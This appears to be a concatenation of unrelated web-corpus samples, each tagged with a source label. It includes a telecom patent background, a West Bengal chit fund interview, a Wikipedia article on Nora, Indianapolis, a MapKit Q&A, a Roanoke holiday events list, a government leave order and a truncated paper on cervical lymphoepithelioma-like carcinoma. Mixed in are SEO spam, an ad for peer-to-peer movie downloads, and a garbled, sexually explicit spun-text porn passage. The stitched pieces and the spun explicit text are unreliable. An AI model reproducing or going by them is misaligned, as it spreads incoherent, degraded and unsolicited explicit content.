myself in the work and write stuff I am not expected to be doing right now. Worse, though, is that the effort of restraining myself to just writing what’s expected is unnatural to me. My brain rebels a bit, and I’m quite sure my overall throughput is somewhat lower because of it. As a result: a less enjoyable writing experience for me, less overall content created, and unmet goals. I wonder, sometimes, how my work results would look if I were able to cut loose and just go again. I know I have other issues slowing me down (see my earlier blog post Peripheral neuropathy and me), but I can’t help wondering if I could be more productive by working how I think, instead of doing what doesn’t come naturally: work on a single thing from A to Z without any deviation at all for any reason. Share this: Twitter Facebook Pocket Email
{ "pile_set_name": "OpenWebText2" }
As a really common recycled material, wooden pallet you might have used them to make something useful for your home. You know they have endless potential can be transformed to a lot of stunning DIY projects serve for home. Looking for best winter season hair colors 2018 right now? Just browse here and see how beautiful hair colors we've compiled here for you for elegant and cute hair look. Women and young girls who're searching for unique hair colors they can see here the best ideas of hair colors for 2018.
{ "pile_set_name": "Pile-CC" }
This invention relates generally to communication within a mobile telecommunications system, and more particularly this invention relates to communication between a base station (Node B) and a radio network controller (RNC) in order to enhance call control and resource management. The telecommunications industry is in the process of developing a new generation of flexible and affordable communications that includes high-speed access while also supporting broadband services. Many features of the third generation mobile telecommunications system have already been established, but many other features have yet to be perfected. One of the most important systems within the third generation of mobile communications is the Universal Mobile Telecommunications System (UMTS) which will deliver voice, data, multimedia, and wideband information to stationary as well as mobile customers. UMTS is designed to accommodate increased system capacity and data capability (UMTS is synonymous with WCDMA or wideband code division multiple access). Efficient use of the electromagnetic spectrum is vital in UMTS. It is known that spectrum efficiency can be attained using frequency division duplex (FDD) or with time division duplex (TDD) schemes, and these schemes can be employed in the context of UMTS and WCDMA. As can be seen in FIG. 1, the UMTS architecture consists of user equipment 102 (UE), the UMTS Terrestrial Radio Access Network 104 (UTRAN), and the Core Network 126 (CN). The air interface between the UTRAN and the UE is called Uu, and the interface between the UTRAN and the Core Network is called Iu. The UTRAN consists of a set of Radio Network Subsystems 128 (RNS), each of which has geographic coverage of a number of cells 110 (C), as can be seen in FIG. 1. The interface between the subsystems is called lur. Each Radio Network Subsystem 128 (RNS) includes a Radio Network Controller 112 (RNC) and at least one Node B 114, each Node B having geographic coverage of at least one cell 110. As can be seen from FIG. 1, the interface between an RNC 112 and a Node B 114 is called Iub, and the Iub is hard-wired rather than being an air interface. For any Node B 114 there is only one RNC 112. A Node B 114 is responsible for radio transmission and reception to and from the UE 102 (Node B antennas can typically be seen atop towers or preferably at less visible locations). The RNC 112 has overall control of the logical resources of each Node B 114 within the RNS 128, and the RNC 112 is also responsible for handover decisions which entail switching a call from one cell to another or between radio channels in the same cell. The FDD method uses separate frequency bands for uplink and downlink transmissions over the Uu interface (i.e. over the air interface between UTRAN 104 and the User Equipment 102). In contrast, the TDD method allocates different time slots (compared to different frequencies) for these uplink and downlink communications. Generally, TDD is very flexible regarding the allocation of time slots, and therefore is very well-suited to applications that are asymmetric with respect to uplink and downlink data volume (e.g. web browsing entails a much higher downlink than uplink data volume). Combining FDD and TDD modes provides maximum efficiency and flexibility for third generation networks. In order for the RNC 112 to provide effective call control and resource management to each Node B 114, it must receive information from the Node B 114 about Node B""s time-dependent resources. The problem of obtaining appropriate resource information from Node B 114 has not been adequately addressed by the related art, especially with regard to TDD (as compared to FDD), and therefore the ability of an RNC 112 to provide call control and resource management has suffered. A particularly important piece of information for the RNC 112 to receive is information about the currently available processing capacity at Node B 114. Processing capacity is to be distinguished from air interface capacity. Air interface capacity is limited by factors such as noise and interference, whereas processing capacity refers to the capacity of the Node B 114 itself to process calls. When the RNC 112 does not accurately know the processing capacity of Node B 114 that is currently available, it is very difficult or impossible for the RNC 112 to accurately allocate call traffic to the Node B 114. It is important to understand that the processing capacity at Node B 114 varies from time to time even if the number of user equipments 102 (UE) remains the same. This variation is due to the fact that the required processing per UE 102 depends upon how the logical resources of Node B resources are used for each of the particular UEs. The required processing for a particular user can depend upon what kind of coding a user has, how many multicodes are involved, how the users are divided in different time slots (TDD only), the number of users involved in a handover (FDD only), how the user""s data stream is divided if there are multiple channel elements, the quality of service assigned to a call, et cetera. Thus, it is not adequate for the RNC 112 to simply know the number of UE""s that a Node B 114 is handling, because each Node B 114 may require a different type of implementation. Rather, the RNC 112 should ideally receive from the Node B 114, over the Iub interface, a simple and accurate measure of the Node B""s available processing capacity without any need for specifying the particular implementations that Node B 114 is providing to each UE 102. In TDD, no adequate solution to this problem has been developed. In FDD, the problem has been partially addressed by using the spreading factor of Node B 114 as an indicator of processing capacity, and reporting this spreading factor over the Iub. With WCDMA, information bits are spread over an artificially broadened bandwidth. This task is accomplished by multiplying the bits, using a pseudorandom bit stream. The bits in the pseudorandom bit stream are referred to as chips, so the stream is known as a chipping, or spreading, code. This spreading increases the bit-rate of the signal, and increases the amount of bandwidth occupied by the signal, by a ratio known as the spreading factor, namely, the ratio of the chip rate to the original information rate. The spreading factor can be used with limited success to indicate processing capacity in FDD, but the spreading factor is almost completely insufficient in TDD, because the TDD spreading factor is substantially constant in the downlink to the UE 102, and furthermore the TDD spreading factor range is very narrow as compared with the FDD spreading factor range (e.g. 1-16 in TDD as compared with 4-512 in FDD). In particular cases, the spreading factor might vary between two values in TDD, but such a rough measurement would not allow the RNC 112 to meaningfully model the processing capacity of Node B 114, and thus the processing capacity parameter is currently undefined in TDD. Even in FDD, using the spreading factor is not an ideal solution, because the FDD spreading factor becomes imprecise at the start of the 4-512 scale (e.g. the spreading factor between 4 and 8 corresponds to a very large difference in processing capacity). Information about the use of the spreading factor as an indicator of FDD processing capacity can be found, for example, in publications of the 3rd Generation Partnership Project (3GPP). In particular, 3GPP TS 25.433 xe2x80x9cUTRAN Iub Interface NBAP Signalingxe2x80x9d (Version 3.3.0, September 2000) describes how the RNC 112 audits resources at the Node B 114, which then reports processing capacity by way of an audit response (section 8.2.7). The 3GPP TS 25.433 publication also describes how the Node B 114 may report to the RNC 112 at the Node B""s own initiative by way of a resource status indication (section 8.2.15). These are the only two instances in which the prior art suggests reporting processing capacity from the Node B 114 to the RNC 112, and this fact unnecessarily limits the accuracy of the processing capacity of Node B 114, as perceived by the RNC 112. The 3GPP TS 25.433 publication also describes various exchanges of signal between the RNC 112 and the Node B 114 that do not involve processing capacity (see section 8.2.17 on radio link setup, section 8.3.1 on radio link addition, and section 8.3.6 on radio link deletion). Publication 3GPP TS 25.433 furthermore describes that the spreading factor is the parameter which is used to tell the RNC 112 how much capacity is being consumed by the Node B 114 (see especially sections 9.2.2.3 and 9.2.2.6). The presently disclosed method is based upon a system structure similar or identical to the prior art Universal Mobile Telecommunications System (UMTS) architecture shown in FIG. 1, but the present invention solves the problem of how to report the amount of processing capacity that is currently available at a Node B 114 to an RNC 112. This invention may occur in the context of UMTS, utilizing wideband code division multiple access (WCDMA) as well as UMTS terrestrial radio access (UTRA). The presently disclosed method, which enables the RNC 112 to enhance call control and resource management, begins with generation of a processing capacity inquiry signal. Then, a processing capacity report signal is generated and sent from the Node B 114 to the RNC 112, in response to the processing capacity inquiry signal. The processing capacity report signal has a magnitude indicative of available bit rate (ABR) associated with the base station. Thus, the present invention utilizes the available bit rate (ABR) as a measure of processing capacity, whereas the prior art only utilizes the spreading factor for this purpose. As described previously, the spreading factor is generally not a good measure of processing capacity, especially when using TDD. Using the available bit rate (ABR) as the TDD capacity parameter is the optimal solution to this problem. The ABR addresses the fundamental gap in the capacity modelling of Node B 114, inasmuch as a capacity parameter is currently undefined for TDD. According to the present invention, processing capacity information is not sent from Node B 114 to the RNC 112 on a dynamic basis, but rather is sent at discrete times, and the RNC 112 uses this discrete processing capacity information to model the actual continuous processing capacity at Node B 114. When the RNC 112 inputs the ABR into its capacity model for Node B 114, the RNC 112 obtains a vastly more accurate characterization of Node B""s processing capacity (in TDD) than would be obtained by inputting the Node B""s spreading factor into the capacity model of Node B 114. Available bit rate (ABR) can provide for transport of traffic at the bit rate available at a given time, and therefore ABR is well-suited as a processing capacity parameter in TDD. Even in FDD, the ABR is an excellent alternative (or supplement) to the spreading factor, for the purpose of communicating processing capacity from the Node B 114 to the RNC 112. The ABR provides better granularity than the spreading factor parameter, especially at the low end of spreading factor values where a unit change in spreading factor means a difference in spreading factor on the order of 100%. Furthermore, this ABR parameter is appropriate for FDD because it can be used independently of whichever radio transmission technology resources are being used by the system, and independent of hardware. The present method can be used if Node B 114 utilizes an FDD system or a TDD system, or both. Likewise, the ABR may include an uplink ABR or a downlink ABR, or both. Furthermore, in FDD, the ABR can be used as the sole parameter indicative of processing capacity, or the ABR can be used in conjunction with the spreading factor to indicate processing capacity. The capacity inquiry signal can be provided either by the RNC 112 or by a component of Node B 114 itself, as in the prior art. However, the present invention discloses additional ways by which the capacity inquiry signal can be provided by the RNC 112, and thus the present invention remedies the prior art situation in which the accuracy of the Node B""s processing capacity, as perceived by the RNC 112, is unnecessarily limited. These additional ways of providing the capacity inquiry signal can be employed regardless of whether the processing capacity parameter is the spreading factor or is the available bit rate. At a Node B 114 utilizing TDD, different bit rates occur when more codes are allocated to a user or when more time slots are allocated to the user. The Node B 114 processing resource is thus likely to be utilized at a higher rate when one time slot is allocated to multiple users as opposed to being allocated to a single user, and when one user has been allocated several time slots as opposed to a single time slot. Whatever the allocations may be, the present invention ensures that the processing capacity parameter is reported by the Node B 114 to the RNC 112 independently of the particular hardware and software implementations that each UE 102 is using.
{ "pile_set_name": "USPTO Backgrounds" }
Why is West Bengal Chief Minister Mamata Banerjee at loggerheads with the Centre? What is this chit fund scam all about? And why did the Trinamool Congress chief go on a dharna for three days? If these questions puzzle you, here are some answers, courtesy Dr Sujan Chakraborty, the Left Front legislative party leader in West Bengal who has organised protest rallies by the Chit Fund Sufferers's Unity Forum. "The BJP is using the chit fund scam as a political game," Dr Chakraborty -- a former Communist Party of India-Marxist MP -- tells Syed Firdaus Ashraf/Rediff.com. The TMC blames Bharatiya Janata Party leaders Mukul Roy and Himanta Biswas Sarma while the BJP blames TMC leaders involved in the chit fund scam. Can you give us a clear picture as to what is happening? This is not a tussle between the Centre and state as it is being portrayed. This issue is of complete corruption and lakhs of people who have been looted and cheated in the country because of the chit fund scam. The leadership and the administration of the ruling party in the state are identified and known in the chit scam. Along with them other leaders from different parties too are involved like BJP leader Himanta Biswas Sarma from Assam and some people from Orissa. But the difference is that all the other states agreed to the CBI probe except West Bengal. They opposed the CBI investigation. One wonders why the CBI did not take any action for the last five years in the chit fund scam and woke up all of a sudden. The CBI has knowledge of many things and has arrested many people. When they started making arrests, Mamata Banerjee opposed it in different ways. For example, when her cabinet minister Madan Mitra was arrested, they (the TMC) took out a rally (in his support). In this case concerning Police Commissioner Rajeev Kumar, she sat on a dharna. In your opinion, why did Mamata sit on a dharna? All documents regarding the chit fund scam have been hushed up by Rajeev Kumar. He knows many details and he even knows of the criminality and corruption of the supreme leaders of the TMC. Therefore, she is apprehensive of Rajeev Kumar's arrest. When those who suffered in the chit fund scam were in trouble, she said what is done is done to them. Mamata did not stand up for those who suffered owing to the chit fund scam, but only stood up for Police Commissioner Rajeev Kumar because he has all the knowledge about the chit fund case. And to answer your earlier question of why is the CBI taking action after four years. It is because the BJP wants to use this case for political advantage. They are not sincere or serious (to recover the money of the chit fund investors). Mukul Roy, who was with Mamata, has now gone to the BJP and is now being protected by them. Similarly, Bharati Ghosh, the ex-cop, has now joined the BJP for protection. The BJP is using the chit fund scam as a political game. What role has Rajeev Kumar played in this chit fund scam due to which Mamata has come out in his support? He was the heading the SIT (Special Investigation Team) probing the chit fund scam. He was supposed to investigate it in April 2013. The CBI inquiry was ordered in May 2014. He had a year to probe; he was instrumental in destroying or tampering evidence etc. That is why he is so important. When the CBI targeted then Gujarat chief minister Modi, he used it as a political opportunity, saying the CBI under the central government is hurting Gujarat's asmita (pride). Is Mamata not doing the same? Bengal people understand Mamata's politics. They are not fools. The BJP is trying to portray that it is fighting against corruption, but that is not a true picture. What has happened to the investors? Where are they? And what do they say? In West Bengal, it is complete autocracy. The media is not allowed to speak. The investors (those who lost money in the chit scam) are having programmes in every district of West Bengal and demanding payback of their invested money. They are organised and have gone to court to recover their money, but they are poor people. They cannot come out for protests every time. Many of them are poor people and they have to earn a livelihood. Do these poor people who have invested money in the chit funds expect their money back? Some people feel the money is lost forever. The chief minister has not done anything for the last four, five years. She is opposing the CBI inquiry and is also indifferent (to the investors's lost money). The Trinamool Congress and the administration are running a police raj in Bengal. Even if you go to lodge a police complaint, it will not be lodged. Permissions for political meetings are not given. When the prime minister of India comes to Bengal, whether a helipad will be allowed for him or not is being questioned. Such is the state of affairs. These things never happened in Bengal. The political space to oppose is getting lost.
{ "pile_set_name": "Pile-CC" }
Nora, Indianapolis Nora is a community on the far north side of Indianapolis, Indiana. It is home to North Central High School and birthplace of the popular Monon Trail. Nora's neighborhoods typically feature diverse housing stock, large lots and mature trees. The Nora community contains six distinct business/commercial districts, including Nora Plaza, Greenbriar Plaza, and The Fashion Mall at Keystone. Nora is generally considered to be contained by White River on the east (southward around the Broad Ripple oxbow), Williams Creek and 79th Street on the south, Township Line Road on the west, and 96th Street (which forms the border between Marion and Hamilton counties) and I-465 on the north. Nora was never an incorporated town, so its accepted boundaries have varied. Today, the boundaries of Nora are commonly accepted as the area defined by the Nora-Northside Community Council. History The name Nora for this area can be traced back to December 1871, when Swedish immigrant Peter Lawson was appointed postmaster at Nora. Lawson owned a grocery store situated at what is today the southwest corner of Westfield Boulevard and 86th Street. Lawson named the area after his home parish in Sweden. He was born as Per Israelsson on March 29, 1828, in Blexbergstorp, Nora parish, Örebro County Sweden. He emigrated in 1854 and from at least 1860 he is known to have lived in Washington Township, Marion County. In 1861 he was one of the founding members of the Union Church Washington Township. Lawson died on October 29, 1884, and was buried in Crown Hill Cemetery. The locality of Nora grew around Lawson's grocery store and post office. Soon there were more shops, smithies, and a train station in the area. Nora Elementary School was opened in 1895. About 150 people lived in Nora in the 1880s, but the area did not become densely populated until the mid-1900s. Nora Plaza Shopping Center was built in 1959, anchored by an Ayr-Way that became a Target and a Standard that later became a [[Lowells No Frills Discount Foods]], Wild Oats Market, and most recently Whole Foods. A new post office was opened in 1961 (a Steak 'n Shake is at the old location). Nora Community Council was established in 1967. It became part of Indianapolis under Unigov in 1970. Education Nora has a public library, a branch of the Indianapolis Public Library. Nora Elementary School, part of the Metropolitan School District of Washington Township, is in the neighborhood. as is North Central High School. References Håkan Henriksson: Spår av Örebro län i Amerika. In Lokalhistorisk läsning för Örebro län nr 5'' (Örebro, 1999). Nora Northside Community Council boundary map Nora Alliance External links Nora Alliance Nora-Northside Community Council Category:Neighborhoods in Indianapolis Category:Populated places established in 1871 Category:1871 establishments in Indiana
{ "pile_set_name": "Wikipedia (en)" }
'Go on with the next verse,' the Gryphon repeated impatiently: 'it begins "I passed by his garden."' Alice did not dare to disobey, though she felt sure it would all come wrong, and she went on in a trembling voice:--
{ "pile_set_name": "Github" }
Q: Mapkit, how to detect annotations have loaded I want the annotations callout to popup when the pin has finished it's drop animation. Currently I am able to simulate it with the following method: - (void)showCallOut { [myMapView selectAnnotation:[myMapView.annotations objectAtIndex:0] animated:YES]; } In my viewDidLoad is where my annotation is created [myMapView addAnnotation:annotation]; The problem is that you simply can't callout [self showCallOut]; after that because at run time it responds before MapKit has "acknowledged" the annotation drop. I need to either create a delay (Would like to avoid this) or find the proper way to detect when annotations are in place and then run the showCallOut method. Thanks for any help! Thanks to aBitObvious below for providing a solution: - (void)mapView:(MKMapView *)mapView didAddAnnotationViews:(NSArray *)views { [self performSelector:@selector(showCallOut) withObject:nil afterDelay:1]; } A: Try using the didAddAnnotationViews delegate method: - (void)mapView:(MKMapView *)mapView didAddAnnotationViews:(NSArray *)views { [self showCallOut]; } Make sure your map view's delegate is set. Edit: If you need to add a delay regardless, then try this instead (example with 1/2 second delay): - (void)mapView:(MKMapView *)mapView didAddAnnotationViews:(NSArray *)views { [self performSelector:@selector(showCallOut) withObject:nil afterDelay:0.5]; }
{ "pile_set_name": "StackExchange" }
A group of young scientists are working on a secret project that may allow them to travel ahead in time. They test it by sending one of their own ahead one hour. He returns pleading with them to shut it down, explaining that within that hour, they will all die. The Nachos Time service can be used to download your favourite Movies. Find a movie, watch trailers, read synopsis and download any movie you desire. The Movies are downloadable via peer-to-peer connection, So you can watch as many Movies, as long as you want.
{ "pile_set_name": "Pile-CC" }
1. Dickens of a Christmas Downtown RoanokeDecember 1, 8, 15 Back for its 35th year, The Roanoke Times Dickens of a Christmas Festival is an iconic event in Virginia’s Blue Ridge. The festival takes place in Downtown Roanoke during the first three Friday evenings of December and includes performances, tree lighting, caroling, shopping, carriage rides, and more. 2. FrUiTCaKeS Attic ProductionsDecember 1-9 It’s a comedy-filled Southern Christmas with Attic Productions in its performance of FrUiTCaKeS. The play by Julian Wiles is about a city kid named Jamie who runs away from home and makes his way to a small town where the residents are “nuttier than fruitcakes.” 3. An Old Virginia Christmas Booker T. Washington National MonumentDecember 2 The Booker T. Washington National Monument introduces visitors to an “Old Virginia Christmas” with the experience of what life was like for residents, both free and enslaved, on a 19th-century tobacco plantation that was the birthplace of Booker T. Washington. 4. Gingerbread Festival Salem Public LibraryDecember 2 Culinary art is on full display at the annual Gingerbread Festival in the Salem Public Library. The main feature is the gingerbread house competition, but there are also kid-friendly crafts activities, marshmallow roasting, food vendors and more. 5. Live Music: Tara Dente Starr Hill Pilot Brewery & Side StageDecember 2 The Starr Hill Pilot Brewery & Side Stage is one of multiple new spots to enjoy great craft beer in Virginia’s Blue Ridge, and they also plan to regularly feature live music. On December 2, there will be a free concert by Tara Dente, a folk/alternative guitarist and singer/songwriter from New Jersey. 6. Candy Cane Express Virginia Museum of TransportationDecember 2-3 Hop aboard the Candy Cane Express at the Virginia Museum of Transportation! The two-day event will have photo opportunities with Santa, face painting, scavenger hunts, train rides, and all the great exhibits at the museum. 7. Old Southwest Holiday Parlor Tour of Homes Historic Old SouthwestDecember 2-3 This holiday home tour is a great way to see and learn about the architecture in many of the historic homes in Roanoke’s Old Southwest Neighborhood. 7 historic properties are decorated for the holidays and showcased in this walking tour. 8. 2017 Roanoke Holiday Lights Bike Tour Grandin VillageDecember 6 Of course we incorporate biking into the holiday fun in Virginia’s Blue Ridge! RIDE Solutions hosts the Roanoke Holiday Lights Tour as a way for people to join together with a bike ride through the city to take in some of the local holiday decorations and lights. There’s even a Zagster bike share station near the start & finish point of the ride, offering a great option for anyone who doesn’t own their own bike. 9. A Christmas Story Mill Mountain TheatreDecember 6-23 Nothing will stop Ralphie Parker from his dream of owning a Red Ryder BB Gun, even if it means he’ll shoot his eye out! “A Christmas Story” is a classic Christmas movie that has become a holiday tradition for many, and this year Mill Mountain Theatre presents the theatrical production of the story. 10. Roanoke Symphony Orchestra: Holiday Pops! Salem Civic Center - December 8Moss Arts Center at Virginia Tech - December 9 Sing along to all your holiday favorites and learn a few new ones at the annual Holiday Pops performance by the Roanoke Symphony Orchestra. The group performs at the Salem Civic Center on December 8 and at the Moss Arts Center at Virginia Tech on December 9. 11. Historic Fincastle Inc. Holiday Home Tour & Marketplace Historic FincastleDecember 9 There are over two centuries of history in the Town of Fincastle in Botetourt County, with some homes dating back to construction in the 1770s. The town’s historic district has over 100 buildings and the annual holiday home tour is a wonderful way to take in the history of the community while also supporting the local businesses. 12. Southwest Virginia Ballet’s The Nutcracker Berglund CenterDecember 9-10 The Southwest Virginia Ballet has entertained locals and visitors for years with its annual presentation of The Nutcracker. You’ll be lead on a journey of sugar plum fairies and the Land of Sweets for one magical night in this show that is made up of performers from over 15 dance schools throughout the region. Berglund CenterMultiple Dates Things are heating up on the Berglund Center ice with the Roanoke Rail Yard Dawgs! The Dawgs have multiple home games this month, including a New Year’s Eve contest against Knoxville at 6:05 p.m. - a perfect way to begin your evening before you ring in the arrival of 2018. 14. Ye Olde Salem Christmas Salem Farmers MarketDecember 9 It’s an old-fashioned Christmas in Downtown Salem at the Ye Olde Salem Christmas celebration. There will be festive decorations, baked goods, various art & craft vendors, and a merchant open house for all kinds of holiday shopping. 15. Ring in the Season! Ladies A Capella Barbershop! Showtimers Community TheatreDecember 12 The Star City Sounds Chorus presents a night of holiday a capella music at the Showtimers Community Theatre! Get your tickets now to make sure you don’t miss this opportunity to listen to the music of the season. 16. Big Lick Ugly Sweater Holiday Party Big Lick Brewing CompanyDecember 15 Put on your tackiest Christmas sweater and get ready to deck the halls at Big Lick Brewing Company’s Ugly Sweater Holiday Party. There will be costume contests, live music, food by 2Dye4Que and great beer on tap, all at Big Lick’s beautiful new facility. Salem Football StadiumDecember 15 The NCAA Division III Football Championship returns to Salem Stadium in Virginia’s Blue Ridge with the 2017 Amos Alonzo Stagg Bowl. A champion will be crowned in what should be a fantastic atmosphere for this nationally televised game. 18. The Best Christmas Pageant Ever: The Musical Roanoke Children’s TheatreDecember 20-23 The Herdman kids ruin everything. What will happen when they take part in the church Christmas pageant? Find out as the Roanoke Children’s Theatre presents The Best Christmas Pageant Ever: The Musical, a family-friendly show full of laughs, shenanigans, and holiday spirit. 19. Christmas Eve Luminary Display Town of BuchananDecember 24 There’s something magical about the Christmas glow of the Town of Buchanan with its annual Christmas Eve Luminary Display. Hundreds of candles are lined up along the historic town’s streets in this charming holiday display. 20. Big Lick Downtown Countdown NYE Festival Downtown RoanokeDecember 31 The Big Lick Downtown Countdown New Year’s Eve festival returns to Downtown Roanoke for its 5th year! We’ll celebrate with live music, food and drinks, and a family-friendly party to end 2017 in style. Get your tickets now as this event sells out every year. Visit our Calendar of Events for a complete list of what’s going on in Virginia’s Blue Ridge. You can also check out our Holidays section for more ideas of things to do during the holiday season. Author: David Aldridge David is the Digital Marketing Manager for Visit Virginia's Blue Ridge. When he's not working, you can probably find David on an adventure with his wife, Nicole, trying a new restaurant in Virginia's Blue Ridge, hiking on one of the many nearby trails, having a Netflix marathon, or hanging out at the dog park with Abbey, his rockstar pet corgi. Have an idea for a blog post or a tip? Send David an e-mail.
{ "pile_set_name": "Pile-CC" }
GO.119 Sanction of Spl CL to Presiding Officers and APOs on the Next Day of Poll GO.119 Govt has ordered the Leave Sanctioning Authorities to grant Special Casual Leaveon the next day of poll to their staff members, whose services have been utilized as Presiding Officers and Assistant Presiding Officers during the General/Bye Elections to House of People and AP Legislature (both Assembly and Council Constituencies) on production of a leave letter together with the Election duty Certificate. ELECTIONS – General/Bye Elections to House of People and Andhra Pradesh Legislature (Assembly and Council) - Sanction of Special Casual Leave to the Presiding Officers and Assistant Presiding Officers on the next day of poll – Orders - Issued. G.O.Ms.No.119 Dated:25-04-2014 GO.119 Spl CL to Presiding Officers and APOs on the Next Day of Poll O R D E R: In reference read above, it has been represented that the Presiding Officers and Assistant Presiding Officers of a polling booth have to hand over the Polled Ballot Boxes/EVMs & all other material at appropriate reception centers in the mid night of the poll day and they are not able to reach their home upto 1.00 am or 2.00 am and it has been requested to sanction a Special Casual Leave on the next day of poll as a special case and to arrange to issue necessary orders in the matter. 2. Government, after careful examination of the matter, have decided to accept the said request. 3. Accordingly, all the leave sanctioning authorities of the Personnel, who have been drafted as Presiding Officers and Assistant Presiding Officers are, hereby directed to grant Special Casual Leave on the next day of poll to their staff members, whose services have been utilized as Presiding Officers and Assistant Presiding Officers during the General/Bye Elections to House of People and AP Legislature (both Assembly and Council Constituencies) on production of a leave letter together with the Election duty Certificate issued by the concerned Returning Officer at reception centre for the said purpose. 4. All the District Election Officers are requested to direct all the Returning Officers to issue an “Election Duty Certificate” in the format appended to this order, to all the Presiding Officers and Assistant Presiding Officers, who have actually attended the duty in Polling Station, at the reception centre after handing over all the relevant election material so as to enable them to avail the said Special Casual Leave. The reserve Presiding Officers and Assistant Presiding Officers are not entitled for this facility. All the Departments of Secretariat / Heads of Departments / District Election Officers are requested to communicate these instructions to all concerned, particularly, the leave sanctioning authorities of the Presiding Officers and Assistant Presiding Officers from which Department / Office they have been drafted for the election duty, for taking further action.
{ "pile_set_name": "Pile-CC" }
Jism-covered Hotwife Vengeance Mary discovered one thing in her bf's telephone that were given her indeed dissatisfied and now this vindictive blond is gonna have her wild vengeance in this hotwife willy. Nursling has him eyes covered and duct-taped to a iron publish and when a blindfold comes off the scanty stud observes his stunner with every other stud who evidently got here to pound her. Rattling, sprout does it proper in entrance of his eyes and shamelessly takes a money-shot on her ultra-cute tiny mammories. Vengeance dostared!
{ "pile_set_name": "OpenWebText2" }
Lindenwood University received two awards at the American Humanics Management/Leadership Institute last month in Indianapolis, Ind. One of the awards was in honor of the school’s internship programs, and the other was an individual award to recognize one student’s fundraising efforts. Lindenwood’s American Humanics program was recognized for having the greatest percentage of students participating in internships, the greatest integration of American Humanics National Nonprofit Partners and the greatest community impact. Lindenwood American humanics students participated in 27 internships in the 2007-08 academic year, out of 63 eligible students, for a participation rate of almost 43 percent. Ten of the internships were conducted with AH National Nonprofit Partners. Accepting the award was Jack Beckerle, director of Lindenwood’s AH program. Additionally, Lindenwood student Latasha Lawrie received the first-ever Hartsook Companies’ American Humanics Individual Excellence in Fundraising Award. Lawrie’s efforts in recruitment and organization in the AH Student Association’s “Up ‘Til Dawn” campaign led them to surpass the event’s fundraising goal, raising nearly $35,000 for St. Jude Children’s Research Hospital. She also provided leadership for the student association’s annual golf tournament, which raised nearly $3,000. More than 1,000 students, faculty, and nonprofit and corporate leaders took part in the AH leadership institute, a capstone educational experience for college students earning AH certification in nonprofit leadership and management. American Humanics is a national alliance of colleges, universities and nonprofits dedicated to preparing the next generation of nonprofit sector leaders. Founded in 1948, American Humanics is affiliated with nearly 70 colleges and universities nationwide and partners with more than 60 national nonprofit organizations, including the YMCA, the March of Dimes and the Girl Scouts of the USA. Lindenwood University, founded in 1827, is an independent liberal arts university offering 84 undergraduate degree programs and 37 graduate programs in diverse areas of study in traditional and accelerated formats. Lindenwood operates a residential campus in historic St. Charles, as well as 10 extended sites throughout the St. Louis metropolitan area.
{ "pile_set_name": "Pile-CC" }
1. Introduction {#sec1-medicina-55-00780} =============== Lymphoepithelioma-like carcinoma (LELC) is a histological type of malignant tumor arising from the uncontrolled mitosis of transformed cells originating in epithelial tissue. It is a common type of poorly differentiated epithelial cells in the nasopharynx \[[@B1-medicina-55-00780],[@B2-medicina-55-00780],[@B3-medicina-55-00780]\]. LELC is seen in salivary glands, lungs, nasopharynx, skin, thymus, stomach, urinary bladder, and uterine cervix \[[@B2-medicina-55-00780],[@B4-medicina-55-00780]\]. The diagnosis is pathomorphological. According to World Health Organization, cervical cancer is the fourth most frequent cancer in women with an estimated 570,000 new cases in 2018 representing 6.6% of all female cancers, and approximately 90% of deaths from cervical cancer occur in low- and middle-income countries \[[@B5-medicina-55-00780]\]. The most common histological type of cervical neoplasia is squamous cell carcinoma (SCC), at around 80% of all cases. A rare subtype of SCC is lymphoepithelioma-like carcinoma. It was reported for the first time by Hamazaki et al. in 1968 \[[@B6-medicina-55-00780]\]. In the literature, LELC is described mainly in case reports \[[@B7-medicina-55-00780]\]. There are significant differences in frequency, mean age, viral status, and outcomes in Asian or Caucasian patients \[[@B7-medicina-55-00780],[@B8-medicina-55-00780]\]. The objective of our study was to analyze the frequency of LELC in hospitalized women with cervical cancer, as well as the clinical characteristics, treatments, and prognosis of LELC. 2. Materials and Methods {#sec2-medicina-55-00780} ======================== A retrospective study of all cases of LELC of the cervix at the Clinic of Oncogynecology, University Hospital, Pleven, Bulgaria between 1 January 2007 and 31 December 2016 was performed. Clinical data were collected from patients' medical records. Patients with clinical stage I who were initially referred to surgery were analyzed. All histological slides were reviewed by an expert, and the diagnosis was reconfirmed. Pathologic and clinical staging were performed according to TNM classification or FIGO. All patients were followed-up until March 2019. The follow-up was done at 3, 6, 9, 12, 15, 18, 21, and 24 months and then annually, including clinical examination, blood tests, and chest X-ray. Annually a whole-body contrast-enhanced CT was performed. We analyzed some clinical characteristics of the patients, calculated the share of LELC from all patients with stage I cervical cancer, and looked at the overall survival (OS) rate, the 5-year survival rate, the correlation between OS and lymph node status, and the correlation between OS and the size of the tumor. Statistical analysis was done by using SPSS for Windows. 3. Results {#sec3-medicina-55-00780} ========== Six hundred and thirty patients with cervical cancer were operated on in our clinic during the study period. Seventeen of the women had LELC, which represented 3.3% of all cases with cervical carcinoma at stage I (all patients who were referred directly to surgery and no neoadjuvant treatment was performed) during the study period. All of the patients had a histological diagnosis before radical surgery (except for one case) from a cervical biopsy that was done due to abnormal genital bleeding. In one patient, the biopsy showed benign pathology but due to persistence of complaints, a laparohysterectomy (LHT) was performed. The mean age of the patients with LELC was 49.6 years (range 32--67). In one patient a simple hysterectomy was performed because of benign histology after dilation and curettage. In all other patients a radical hysterectomy with total pelvic lymph node dissection was performed. In all patients, adjuvant radiotherapy was done. In 14 patients, immunohistochemical staining (IHC) for human papilloma virus (HPV) and Epstein--Barr virus (EBV) was done, and eight of them (47.1%) were positive for any or both viruses and six (35.3%) were negative for both viruses. In three patients (17.6%), the exam was not performed because of the lack of paraffin blocks. Fourteen patients (82.4%) were in the FIGO IB1 stage, and three patients (17.6%) were in the FIGO IB2 stage. The size of the primary tumor was \<2 cm in five patients (29.4%), 2--4 cm in nine patients (52.9%), and \>4 cm in three patients (17.6%). Lymph nodes were metastatic in three patients (17.6%), non-metastatic in 13 patients (76.5%), and unknown in one patient. The overall survival rate was 76.47% for the study period, and the 5-year survival rate of the patients that were followed-up until the 5th year (14 patients) was 69.23%. When comparing the OS between the non-metastatic lymph node group and the metastatic lymph node group, there was a trend of a lower OS in the metastatic lymph node group ([Figure 1](#medicina-55-00780-f001){ref-type="fig"}), which did not reach statistical significance (*p* = 0.087). When studying the correlation between the OS and the size of the tumor ([Figure 2](#medicina-55-00780-f002){ref-type="fig"}), there was no significant difference between the groups (*p* = 0.327). Some clinical and pathoanatomical characteristics of the patients are presented in [Table 1](#medicina-55-00780-t001){ref-type="table"}. 4. Discussion {#sec4-medicina-55-00780} ============= Histological LELC is composed of poorly 